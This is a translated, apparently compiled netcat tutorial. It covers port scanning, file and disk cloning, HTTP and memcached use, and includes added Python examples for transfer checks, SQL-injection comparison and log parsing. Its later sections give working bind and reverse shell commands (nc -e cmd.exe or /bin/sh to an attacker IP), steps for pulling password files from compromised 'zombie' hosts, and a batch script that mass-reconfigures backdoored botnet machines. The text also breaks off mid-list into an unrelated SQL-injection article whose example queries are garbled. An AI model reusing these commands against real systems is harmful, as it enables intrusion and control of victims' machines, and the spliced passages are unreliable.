Summary of Linux nc command

nc's full name is Netcat (the network "knife"); its authors are Hobbit and Chris Wysopal. It is famous for its powerful functions and compact size and is known as the "Swiss Army Knife" of networking: nc - TCP/IP Swiss Army Knife.

nc is often used for overflow exploitation, reverse connections, uploading text, and so on. It is essentially a non-standard telnet client program, and can fill the same role as a putty.exe-style client.

socat is a replacement for nc, which can be called nc++. It is an N-fold enhanced version of netcat. Socat supports many connection methods, including ip, tcp, udp, ipv6, pipe, exec, system, open proxy, openssl, etc.

Function description: Powerful network tool

Syntax: nc [-hlnruz][-g<gateway...>][-G<number of pointers>][-i<delay seconds>][-o<output file>][-p<communication port>]
[-s<source address>][-v...][-w<timeout seconds>][host name][communication port...]

Parameters:
-g<gateway> Set the router hop communication gateway, up to 8 can be set.
-G <number of pointers> Set the source routing pointer, whose value is a multiple of 4.
-h Online help.
-i<delay in seconds> Set the time interval for sending information and scanning communication ports.
-l Listen mode, for inbound connections (listen on local port).
-n Use the IP address directly without going through a domain name server.
-o<output file> specifies the file name and dumps the transmitted data into the file in hexadecimal code for storage.
-p<communication port> Set the communication port used by the local host.
-r Randomly specify the communication port between the local and remote hosts.
-s<source address> Set the IP address of the local host to send data packets.
-u Use UDP transport protocol.
-v displays the command execution process.
-w<timeout seconds> Set the time to wait for the connection.
-z Use zero-I/O mode; only used when scanning communication ports.

[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22

1) Port Scanning

nc -v -z host.example.com 70-80    # Scan ports 70 to 80; a range can be given. -v prints detailed information.
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24    # You can also try it without the -z parameter
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
# nc -v -z -w2 127.0.0.1 1-100
# nc -v -w 10 10.1.1.180 80
# nc -v -w 10 10.1.1.180 -z 80-30000

# Listen on a local port
# nc -l -p 1234
# netstat -tunlp | grep 1234
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 15543/nc

# Test a UDP port
# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1111/sshd
udp 0 0 0.0.0.0:68 0.0.0.0:* 887/dhclient
# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!

nc -p 1234 -w 5 host.example.com 80

Establish a connection from local port 1234 to port 80 of host.example.com with a timeout of 5 seconds

nc -u host.example.com 53

-u means use UDP instead of TCP.

2) Remotely copy files

Copy the file from server1 to server2.

First, start nc listening on server2; run on server2:

[root@hatest2 tmp]# nc -lp 1234 > install.log

Run on server1:

[root@hatest1 ~]# ll install.log
-rw-r--r-- 1 root root 39693 December 20, 2007 install.log 
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

Listen on the destination host:

nc -l <listening port> > <file name to receive>, for example: nc -l 4444 > cache.tar.gz

The source host initiates the request:

nc <destination host IP> <destination port>, for example: nc 192.168.0.85 4444

netstat then shows the following:

[root@localhost jiangbao]# netstat -tpln
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 18166/nc

Directory Transfer

Copy the contents of the nginx-0.6.34 directory from server1 to server2.

First, start nc listening on server2; run on server2:

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -

Run on server1:

[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf - nginx-0.6.34|nc 192.168.228.222 1234

Copy files from 192.168.2.33 to 192.168.2.34

On 192.168.2.34: nc -l 1234 > test.txt

On 192.168.2.33: nc 192.168.2.34 1234 < test.txt

Clone a hard drive or partition

The operation is similar to the copy above. You only need to use dd to obtain the data of the hard disk or partition and then transfer it.

The operation of cloning a hard disk or partition should not be performed on a mounted system.

Therefore, you need to use the installation CD to boot, enter the rescue mode (or use the Knoppix tool CD) to start the system, and then perform similar monitoring actions on server2:

# nc -l -p 1234 | dd of=/dev/sda

Execute the transfer on server1 to complete the task of cloning the sda hard disk from server1 to server2:

# dd if=/dev/sda | nc 192.168.228.222 1234
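The transfers above move raw bytes with no integrity check. The following is an added Python example (not code from the page) that reproduces the listener/sender pattern over a loopback socket and has the receiving side verify a SHA-256 digest, including the case where the connection drops part-way through; the port is chosen by the OS and the sample data is constructed.

```python
import hashlib
import socket
import threading
from typing import Optional


def sha256_hex(data: bytes) -> str:
    """Digest to compare with `sha256sum install.log` run on the sending host."""
    return hashlib.sha256(data).hexdigest()


def receiver(result: dict, ready: threading.Event, timeout: float = 5.0) -> None:
    """Equivalent of `nc -l -p PORT > file`: accept one connection, read until EOF."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    srv.settimeout(timeout)
    result["port"] = srv.getsockname()[1]
    ready.set()                          # the sender may connect now
    chunks = []
    try:
        conn, _peer = srv.accept()
        with conn:
            conn.settimeout(timeout)
            while True:
                buf = conn.recv(65536)
                if not buf:              # peer closed its write side: EOF, like nc
                    break
                chunks.append(buf)
    finally:
        srv.close()
    result["data"] = b"".join(chunks)


def sender(host: str, port: int, data: bytes, truncate_at: Optional[int] = None) -> None:
    """Equivalent of `nc HOST PORT < file`. truncate_at simulates a connection that
    drops before the whole file is sent (the failure the digest check must catch)."""
    payload = data if truncate_at is None else data[:truncate_at]
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)       # send EOF so the receiver's read loop ends


def transfer_and_verify(data: bytes, truncate_at: Optional[int] = None) -> dict:
    """Run receiver and sender, then compare the digest of what arrived with the
    digest computed on the sending side before transmission."""
    expected = sha256_hex(data)
    result, ready = {}, threading.Event()
    t = threading.Thread(target=receiver, args=(result, ready))
    t.start()
    ready.wait(5.0)
    sender("127.0.0.1", result["port"], data, truncate_at)
    t.join(10.0)
    got = result.get("data", b"")
    return {
        "sent": len(data),
        "received": len(got),
        "expected_sha256": expected,
        "received_sha256": sha256_hex(got),
        "ok": sha256_hex(got) == expected,
    }


if __name__ == "__main__":
    sample = bytes(range(256)) * 512     # constructed 128 KiB stand-in for install.log
    print(transfer_and_verify(sample))
    print(transfer_and_verify(sample, truncate_at=1000))
```

With real nc the same check is `sha256sum` on both hosts; a silently truncated transfer (for example `-w 1` expiring) produces a file that exists but does not match.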

3) Simple chat tool

On 192.168.2.34: nc -l 1234

On 192.168.2.33: nc 192.168.2.34 1234

In this way, both parties can communicate with each other. Use Ctrl+C (or Ctrl+D) to exit.

nc -l 1234
nc 127.0.0.1 1234

Establish a connection on port 1234 and send input to each other

4) Serve a web page

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5) Simulating HTTP Headers

[root@hatest1 ~]# nc www.linuxfly.org 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]

After running the nc command, type the request lines (GET / HTTP/1.1 through User-Agent: my-browser) and press Enter twice to receive the HTTP headers from the other side.

printf 'GET / HTTP/1.0\r\n\r\n' | nc host.example.com 80

Connect to the host and send the request (printf is used because plain echo does not interpret \r\n).

6) Use nc to operate memcached
1) Store data: printf "set key 0 10 6\r\nresult\r\n" | nc 192.168.2.34 11211
2) Get data: printf "get key\r\n" | nc 192.168.2.34 11211
3) Delete data: printf "delete key\r\n" | nc 192.168.2.34 11211
4) Check the status: printf "stats\r\n" | nc 192.168.2.34 11211
5) Simulate the top command to watch the status: watch 'printf "stats\r\n" | nc 192.168.2.34 11211'
6) Clear the cache: printf "flush_all\r\n" | nc 192.168.2.34 11211 (be careful: once cleared, the cache is gone)

Supplementary Tutorial 2

How to use nc

Netcat is known as the 'Swiss Army Knife' of network security. I believe everyone knows it...

A simple but useful tool to read and write data over a network connection using TCP or UDP protocols. It is designed to be a stable backdoor tool that can be easily driven directly by other programs and scripts. At the same time, it is also a powerful network debugging and detection tool that can establish almost all types of network connections you need, and has several interesting built-in functions (see the usage below for details). There are two versions of its WINDOWS version in China, one is the original version written by the original author Chris Wysopal, and the other is the new 'condensed' version compiled by 'Red and Black'. The 'condensed' version of the main program is only more than 10KB (the 10KB NC cannot complete the 4th and 5th methods of use mentioned below. The original NC with this function seems to be 60KB: P). Although the "size" is small, it can complete a lot of work.

Software Introduction:
Tool name: Netcat
Author: Hobbit && Chris Wysopal
Website: http://www.atstake.com/research/tools/network_utilities/
Category: Open Source
Platform: Linux/BSD/Unix/Windows
WINDOWS version number: [v1.10 NT]

Parameter introduction:

You can see how to use each parameter by running nc.exe -h.
Basic format: nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d          background mode
-e prog     program redirection: once connected, the program is executed [DANGER!!]
-g gateway  source-routing hop point[s]; up to 8 can be set
-G num      source-routing pointer: 4, 8, 12, ... (a multiple of 4)
-h          help information
-i secs     delay interval between lines sent or ports scanned
-l          listening mode, for inbound connections (listen on a local port)
-L          keep listening after the connection is closed
-n          numeric IP address only: use the IP address directly, without a DNS lookup
-o file     dump the transmitted data to the file in hexadecimal
-p port     local port number
-r          random local and remote ports
-s addr     local source address
-t          TELNET interactive mode (answer telnet negotiation)
-u          UDP mode
-v          verbose output; use two -v (-vv) for more detailed port information
-w secs     timeout
-z          turn off input and output; only for scanning, where ports can be written as an M-N range

Basic usage:

There are probably the following usages:

1) Connect to the remote host, example:
Format: nc -nvv 192.168.xx 80
Explanation: Connect to TCP port 80 of 192.168.xx
2) Listen to the local host, example:
Format: nc -l -p 80
Explanation: Listen to TCP port 80 of this machine
3) Scan remote host, example:
Format: nc -nvv -w2 -z 192.168.xx 80-445
Explanation: Scan all ports from TCP80 to TCP445 of 192.168.xx
4) Bind a shell on the remote host, example:
Format: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
Explanation: Bind the CMD shell of the REMOTE host to TCP port 5354 of the REMOTE host
5) The REMOTE host binds a SHELL and connects back, example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.xx 5354
Explanation: Bind the CMD shell of the REMOTE host and connect back to TCP port 5354 of 192.168.xx.
The above are the most basic uses (in fact there are many other uses of NC; combined with the pipe "|" and the redirection operators "<", ">" and so on, the commands become far more powerful...).
Advanced usage:
6) Used as an attack program, example:
Format 1: type.exe c:\exploit.txt|nc -nvv 192.168.xx 80
Format 2: nc -nvv 192.168.xx 80 < c:\exploit.txt
Explanation: Connect to port 80 of 192.168.xx and send the contents of c:\exploit.txt through the pipe (the two formats have the same effect; they are really similar in nature :P)
Attachment: c:\exploit.txt is shellcode, etc.
7) Used as a honeypot [1], example:
Format: nc -L -p 80
Explanation: Use -L (note that L is capitalized) to keep listening on a port until ctrl+c is pressed.
8) Used as a honeypot [2], example:
Format: nc -L -p 80 > c:\log.txt
Explanation: Use -L to keep listening on a port until ctrl+c is pressed, and write the results to c:\log.txt. If you change '>' to '>>', the log is appended to instead of overwritten.
Attachment: c:\log.txt is the log, etc.
9) Used as a honeypot [3], example:
Format 1: nc -L -p 80 < c:\honeypot.txt
Format 2: type.exe c:\honeypot.txt|nc -L -p 80
Explanation: Use -L to keep listening on a port until ctrl+c is pressed, and send the contents of c:\honeypot.txt into the pipe.
If the attacker knows that the application will use the content entered in the form directly for the authentication query, he will try to enter some special SQL strings to tamper with the query and change its original function.
Trick the system into granting access. The damage that an attacker may cause varies depending on the system environment, which is mainly determined by the security permissions of the application to access the database.
If the user's account has administrator or other high-level permissions, the attacker may be able to perform any operations he wants on the database tables.
This includes adding, deleting, or updating data, and possibly even directly deleting the table.

2. How to prevent it?

Fortunately, it is not particularly difficult to prevent ASP.NET applications from being attacked by SQL injection. All you need to do is filter all the input content before constructing SQL commands using the content entered in the form. Filtering input can be done in a number of ways.

(1) For situations where SQL queries are constructed dynamically, the following techniques can be used:

First: Replace single quotes, that is, change all single quotes that appear alone into two single quotes to prevent attackers from modifying the meaning of SQL commands. Looking at the previous example again, "Select * from Users Where login = or 1=1 AND password = or 1=1" will obviously get different results from "Select * from Users Where login = or 1=1 AND password = or 1=1".

Second: Delete all hyphens in the user input to prevent attackers from constructing queries such as "Select * from Users Where login = mas -- AND password =", because the second half of such queries has been commented out and is no longer valid. As long as the attacker knows a valid user login name, he or she does not need to know the user's password to gain access.

Third: Limit the permissions of the database account used to execute queries. Perform query, insert, update, delete operations with different user accounts. Since the operations that can be performed by different accounts are isolated, it prevents the place originally used to execute the Select command from being used to execute the Insert, Update, or Delete command.

⑵ Use stored procedures to execute all queries. The SQL parameters are passed in a way that prevents attackers from exploiting single quotes and hyphens. In addition, it allows database permissions to be restricted to only allow specific stored procedures to execute, and all user input must comply with the security context of the called stored procedure, making injection attacks difficult to occur.

⑶ Limit the length of form or query string input. If the user's login name is only 10 characters at most, do not recognize more than 10 characters entered in the form, as this will greatly increase the difficulty for attackers to insert harmful code into SQL commands.

⑷ Check the legitimacy of user input and make sure that the input content contains only legal data. Data checking should be performed on both the client and server sides - the reason for performing server-side validation is to make up for the weak security of the client-side validation mechanism.

On the client side, it is entirely possible for an attacker to obtain the source code of a web page, modify the script that verifies the legitimacy (or simply delete the script), and then submit the illegal content to the server through the modified form. Therefore, the only way to ensure that the validation operation has actually been performed is to perform the validation on the server side as well. You can use many built-in validation objects, such as RegularExpressionValidator, which can automatically generate client-side scripts for validation, and of course you can also insert server-side method calls. If you can't find a ready-made validation object, you can create one yourself through CustomValidator.

⑸ Encrypt and save user login name, password and other data. Encrypting the data entered by the user and then comparing it with the data stored in the database is equivalent to "disinfecting" the data entered by the user. The data entered by the user no longer has any special meaning to the database, thereby preventing attackers from injecting SQL commands. The System.Web.Security.FormsAuthentication class has a HashPasswordForStoringInConfigFile method that is well suited to sanitizing input data.

⑹ Check the number of records returned by the query that extracts data. If the program requires only one record to be returned, but more than one row of records is actually returned, it is treated as an error.
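As an added illustration (not from the article) of the techniques above, here is the same Users query built three ways against a constructed in-memory SQLite table: by string concatenation, with the quote-doubling workaround, and with bound parameters; the `--` comment behaves in SQLite as it does in SQL Server.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("mas", "s3cret"), ("alice", "hunter2")])
    return conn


def rows_concat(conn: sqlite3.Connection, login: str, password: str) -> int:
    """Vulnerable: form input is pasted straight into the SQL text."""
    sql = f"Select * from Users Where login = '{login}' AND password = '{password}'"
    return len(conn.execute(sql).fetchall())


def rows_quote_doubled(conn: sqlite3.Connection, login: str, password: str) -> int:
    """The article's first technique: every single quote becomes two, so the input can
    no longer close the string literal and a trailing '--' stays inside the literal."""
    login, password = login.replace("'", "''"), password.replace("'", "''")
    sql = f"Select * from Users Where login = '{login}' AND password = '{password}'"
    return len(conn.execute(sql).fetchall())


def rows_parameterized(conn: sqlite3.Connection, login: str, password: str) -> int:
    """Preferred form: the driver binds the values, so they are never parsed as SQL."""
    sql = "Select * from Users Where login = ? AND password = ?"
    return len(conn.execute(sql, (login, password)).fetchall())


def authenticated(n_rows: int) -> bool:
    """The article's sixth rule: exactly one row, anything else is an error."""
    return n_rows == 1


if __name__ == "__main__":
    db = make_db()
    for name, fn in [("concat", rows_concat), ("doubled", rows_quote_doubled),
                     ("params", rows_parameterized)]:
        print(name, fn(db, "mas' --", ""), fn(db, "' or 1=1 --", ""), fn(db, "mas", "s3cret"))
```

The row-count rule alone catches the `or 1=1` tautology (two rows) but not the `mas' --` comment trick (one row), which is why the article pairs it with input filtering or, better, parameters.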

nc -l -v -p 7626

Open the local port 7626 for listening and feedback the connection information.

If someone scans for the Iceberg Trojan, they will think that you have been infected with the Trojan and have opened 7626, which is a bit similar to the function of "Piggy Run". If you add a batch file to use it together, it will become a "pig run".

nc -l -p 80 >>c:\log.dat

If you want to monitor whether there is any intrusion into the local port 80 and write it down, use this command. In this way, any attack on port 80 of this machine will be recorded.

nc -l -p 123 -e cmd.exe or: nc -l -p 123 -t

If you have access to someone else's machine through overflow, you can run the above command. The function is to use cmd.exe to respond to the connection to port 123 on the machine.

This turns the overflowed host into a telnet zombie. You can also use commands to make the zombie actively connect to your host; assuming my IP is 192.168.0.1:

Run on the zombie machine: nc -e cmd.exe 192.168.0.1 777 . Then run on the local machine: nc -l -p 777

It means that the bot will actively respond cmd.exe (a shell) to port 777 of your computer. You then listen to port 777 on the local machine, and you will enter the other party's cmd.

This is also the principle of the rebound port Trojan.

nc -v 192.168.0.25 80

Get the information of port 80 of 192.168.0.25. You can get a lot of important information such as IIS version

nc -v -z 192.168.0.25 1-100

Scan TCP ports between 1 and 100 on 192.168.0.25

nc -v -z -u 192.168.0.25 1-100

This scans UDP ports between 1 and 100

nc -vv ip port //Port detection:
RIVER [192.168.0.198] 19190 (?) open //Show whether it is open

scanner

nc -vv -w 5 ip port-port port 
nc -vv -z ip port-port port

Such scans will leave a lot of traces, and system administrators will be extra careful.

Back door

victim machine:             // the victim's machine
nc -l -p port -e cmd.exe    // win2000
nc -l -p port -e /bin/sh    // unix, linux
attacker machine:           // the attacker's machine
nc ip -p port               // connect to victim_IP and get a shell

Reverse Connection

attacker machine:    // usually after a sql2.exe, remote overflow or webdavx3.exe attack,
                     // or the reverse connection of wollf
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker_ip -p port
nc -e /bin/sh attacker_ip -p port

or:

attacker machine:
nc -vv -l -p port1
nc -vv -l -p port2
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

For port 139 the -s parameter must be added (nc.exe -L -p 139 -d -e cmd.exe -s other_machine_IP), so that nc.exe takes precedence over NETBIOS.

Transfer files:

attacker machine <-- victim machine      // pull the password file back from the zombie machine
nc -d -l -p port < path\filedest         // can be run from a shell
nc -vv attacker_ip port > path\file.txt  // needs Ctrl+C to exit; the zombie side has to run this in cmd.exe of a GUI session (terminal login, not as convenient as installing FTP), otherwise there is no way to press Ctrl+C
attacker machine --> victim machine      // upload a command file to the zombie machine
nc -vv -l -p port > path\file.txt        // needs Ctrl+C to exit
nc -d victim_ip port < path\filedest     // can be run from a shell; this direction is better: we log in at the terminal, and when intruding other zombie machines the shell-mode login can be chosen

Port data capture.

nc -vv -w 2 -o test.txt xfocus.Net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error 
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr 
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... 
< 00000084 83 00 00 01 8f # .....
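An added Python example (not from the page): a parser for the hex-dump format that `nc -o file` writes (one line per chunk: direction, offset, hex bytes, `#`, ASCII column), which reassembles each direction's byte stream, checks the ASCII column against the bytes, and flags gaps in the offsets such as the missing first 0x58 bytes of the capture above. The sample dump is constructed to match the page's capture.

```python
import re
from typing import Dict, List, Tuple

# Constructed copy of the page's capture ('<' = received from the peer, '>' = sent).
SAMPLE_DUMP = """\
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
< 00000084 83 00 00 01 8f                                  # .....
"""

LINE_RE = re.compile(
    r"^\s*([<>])\s+([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s+)*[0-9a-fA-F]{2})\s*#(.*)$"
)


def render_ascii(chunk: bytes) -> str:
    """nc's ASCII column: printable ASCII as-is, every other byte as '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)


def parse_dump(text: str) -> List[dict]:
    """One record per dump line; ascii_ok is False if the ASCII column does not
    match the hex bytes (a sign the line was edited or mangled in transit)."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not an nc -o dump line: {line!r}")
        direction, off, hexpart, rest = m.groups()
        ascii_col = rest[1:] if rest.startswith(" ") else rest   # nc prints "# " first
        data = bytes.fromhex(hexpart)                           # whitespace is ignored
        records.append({
            "direction": direction,
            "offset": int(off, 16),
            "data": data,
            "ascii_ok": render_ascii(data).rstrip() == ascii_col.rstrip(),
        })
    return records


def reassemble(records: List[dict]) -> Dict[str, Tuple[bytes, List[Tuple[int, int]]]]:
    """Per direction: the concatenated bytes and a list of (expected, actual) offset
    pairs wherever the dump skips ahead or overlaps, so truncation is visible."""
    streams: Dict[str, dict] = {}
    for rec in records:
        s = streams.setdefault(rec["direction"], {"data": bytearray(), "gaps": [], "next": 0})
        if rec["offset"] != s["next"]:
            s["gaps"].append((s["next"], rec["offset"]))
        s["data"] += rec["data"]
        s["next"] = rec["offset"] + len(rec["data"])
    return {d: (bytes(s["data"]), s["gaps"]) for d, s in streams.items()}


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    for direction, (data, gaps) in reassemble(recs).items():
        print(direction, len(data), "bytes, gaps:", gaps, data)
```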

telnet, automatic batch processing.

nc victim_ip port < path\file.cmd shows the execution process. 
nc -vv victim_ip port < path\file.cmd shows the execution process.
nc -d victim_ip port < path\file.cmd Quiet mode.
_______________file.cmd________________________ 
password 
cd %windir% 
echo []=[%windir%] 
c: 
cd \ 
md test 
cd /d %windir%\system32\ 
net stop sksockserver 
snake.exe -config port 11111 
net start sksockserver 
exit 
_______________file.cmd__END___________________

########################################
Manage zombie machines and change their settings
########################################

1) For example, if you want to uniformly change the proxy port on the botnet, change snake.exe to 11111, service name "sksockserver", and use the winshell backdoor. Port 1234 password password

The command format is:

modi.bat youip.txt
___________modi.bat____________________________ 
@if "%1"=="" echo Error: no ip.txt &&goto END
:start 
@echo password >a.cmd 
@echo s >>a.cmd 
@echo cd /d %%windir%%\system32\ >>a.cmd 
@net stop "sksockserver" >>a.cmd 
@snake.exe -config port 11111 >>a.cmd 
@net start "sksockserver" >>a.cmd 
@exit >>a.cmd
:auto 
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END 
___________modi.bat__END_______________________

2)

@echo off 
color f0 
:start 
cls 
C:\nc -vv -w 3 -l -p 80>>80.txt 
goto start

After turning off the firewall and running this batch file, you will log a lot of Unicode-vulnerability probe traffic, mostly in groups of three: that is the Nimda virus scanning you.
This is how zombie machines are produced. Although their quality is not high, it is a cheap method.
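An added Python example (not from the page) of the detection side of the listener above: it splits the raw requests such an appended log collects and classifies each request line. The log is constructed, modelled on the publicly documented Nimda request patterns (root.exe, the double-encoded %255c and the %c1%1c Unicode form of a backslash); the double decoding and the byte sequences checked are my assumptions about what a reviewer of such a log would look for.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Constructed log in the shape `nc -vv -w 3 -l -p 80 >> 80.txt` would append: one raw
# HTTP request per connection, each ended by a blank line. Not captured traffic.
SAMPLE_LOG = (
    b"GET /scripts/root.exe?/c+dir HTTP/1.0\r\nHost: www\r\n\r\n"
    b"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\nHost: www\r\n\r\n"
    b"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\nHost: www\r\n\r\n"
    b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\r\n\r\n"   # something that is not HTTP at all
)

REQUEST_LINE = re.compile(rb"^([A-Z]{3,7}) (\S+) HTTP/\d\.\d\r?$")
# Overlong UTF-8 forms of '/' and '\' from the IIS Unicode-traversal bug (assumed list).
UNICODE_SLASH = re.compile(rb"%c0%af|%c1%1c|%c1%9c", re.I)
SUSPICIOUS = (b"../", b"..\\", b"cmd.exe", b"root.exe")


def classify_request(raw: bytes) -> Dict[str, object]:
    """Method, path and a tag ('benign', 'traversal-probe' or 'non-http') for one request."""
    first = raw.split(b"\n", 1)[0]
    m = REQUEST_LINE.match(first)
    if not m:
        return {"method": None, "path": None, "tag": "non-http"}
    method, path = m.group(1).decode("ascii"), m.group(2)
    decoded = path
    for _ in range(2):   # decode twice: %255c only becomes '\' after the second pass
        decoded = unquote_to_bytes(decoded)
    decoded = decoded.lower()
    probe = bool(UNICODE_SLASH.search(path)) or any(s in decoded for s in SUSPICIOUS)
    return {"method": method, "path": path.decode("latin-1"),
            "tag": "traversal-probe" if probe else "benign"}


def scan_log(raw_log: bytes) -> Dict[str, object]:
    """Split an appended nc log into requests and count them by tag."""
    counts: Dict[str, int] = {}
    probes: List[str] = []
    for chunk in raw_log.split(b"\r\n\r\n"):
        if not chunk.strip():
            continue
        info = classify_request(chunk)
        tag = str(info["tag"])
        counts[tag] = counts.get(tag, 0) + 1
        if tag == "traversal-probe":
            probes.append(str(info["path"]))
    return {"counts": counts, "probe_paths": probes}


if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Note that an `nc -l` log records what was sent but not who sent it; the -vv output on the console is the only place the peer address appears.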

Zombie machine characteristics:
1. Unicode vulnerability
2. Empty guest password, a user in the administrators group
3. Other vulnerabilities

Transferring files with nc: ncp

#!/bin/sh
## Similar to rcp, but with netcat on a high port
## Do "ncp targetfile" on the receiving machine
## Do "ncp sourcefile receivinghost" on the machine sending the file
## If "nzp" is called, the transferred file will be compressed
## Define the port you want to use here; you can choose freely
MYPORT=23456
## If nc is not in the system path, uncomment the following line and modify it
# PATH=$:$ ; export PATH
## The following lines check the parameter input:
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed s+.*/++`
test "$me" = "nzp" && echo [compressed mode]
# if second arg, it's a host to send an [extant] file to.
if test "$2" ; then
  test ! -f "$1" && echo "cant find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
  else
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  fi
  echo "transfer FAILED!"
  exit 1
fi
# Is there already a file with the same name in the current directory of the receiving machine?
if test -f "$1" ; then
  echo -n "Overwrite $1?"
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
  # Note the usage of nc here, combining redirection symbols and pipes
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1

In this case, on machine A I only need to run first:

QuackA# ncp ../abcd

Then on another machine B:

QuackB# ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?)

On A this appears:

open connect to [192.168.0.2] from quackb [192.168.0.1] 1027
# Check that the file transfer is complete.

===========================================================================
[Local operation] nc -v ip port
[Command Explanation] Scan a port of a certain IP and return detailed output information.
===========================================================================
[Local operation] nc -v -z ip port-port
[Command Explanation] Scan the port of a certain IP to a certain port, and return detailed information output, but the scanning speed is slow.
===========================================================================
[Local operation] nc -v -z -u ip port-port
[Command Explanation] Scan a certain UDP port of a certain IP to a certain UDP port, and return detailed information output, but the scanning speed is slow.
===========================================================================
[Local operation] nc -l -p 80
[Command Explanation] Open the local TCP port 80 and listen.
===========================================================================
[Local operation] nc -l -v -p 80
[Command Explanation] Open the local TCP port 80 and output the monitored information to the current CMD window.
===========================================================================
[Local operation] nc -l -p 80 > E:/log.dat
[Command Explanation] Open the local TCP port 80 and output the monitored information to the log file under E:/log.dat.
===========================================================================
[Local operation] nc -nvv 192.168.1.101 80
[Command Explanation] Connect to port 80 of the host 192.168.1.101.
===========================================================================
[Local operation] nc -nvv -w2 -z 192.168.1.101 80-1024
[Command Explanation] Scan ports 80-1024 of 192.168.1.101, and the connection timeout is 2 seconds.
===========================================================================
[Remote operation] nc -l -p 2012 -t -e cmd.exe
[Local operation] nc -nvv 192.168.1.101 2012
[Command Explanation] Forward connection. Run nc -l -p 2012 -t -e cmd.exe on the remote host (Note: assuming its IP address is 192.168.1.101), which binds the remote host's CMD to port 2012; when the local host connects successfully, a CMD shell is returned to the local host. Run nc -nvv 192.168.1.101 2012 on the local host to connect to the remote host that has redirected CMD to port 2012.
===========================================================================
[Local operation] nc -l -p 2012
[Remote operation] nc -t -e cmd.exe 192.168.1.102 2012
